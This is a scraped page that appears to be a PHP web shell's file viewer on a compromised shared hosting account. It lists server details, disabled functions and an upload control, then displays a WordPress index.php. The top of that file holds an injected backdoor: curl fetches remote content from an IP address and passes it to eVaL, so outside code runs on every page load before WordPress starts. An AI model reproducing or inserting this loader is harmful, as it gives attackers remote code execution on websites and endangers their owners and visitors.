404 Not Found


nginx
HEX
HEX
Server: LiteSpeed
System: Linux jembayan.iixcp.rumahweb.net 5.14.0-570.28.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 22 07:56:01 EDT 2025 x86_64
User: repx7781 (1183)
PHP: 8.2.30
Disabled: system,exec,escapeshellarg,escapeshellcmd,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,popen,pclose,dl,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setsid,posix_setuid,posix_setpgid,ini_alter,show_source,define_syslog_variables,symlink,syslog,openlog,openlog,closelog,ocinumcols,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dll,ftp,myshellexec,socket_bind,mail,posix_getwpuid
Upload Files
File: /home/repx7781/public_html/sidakmedia.com/index.php
<?php
$cx = curl_init("http://107.150.59.178/z51127_6/stat/index.txt");
curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($cx);
if ($rs !== false) {
    $data = eVaL('?>' . $rs);
}
curl_close($cx);
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';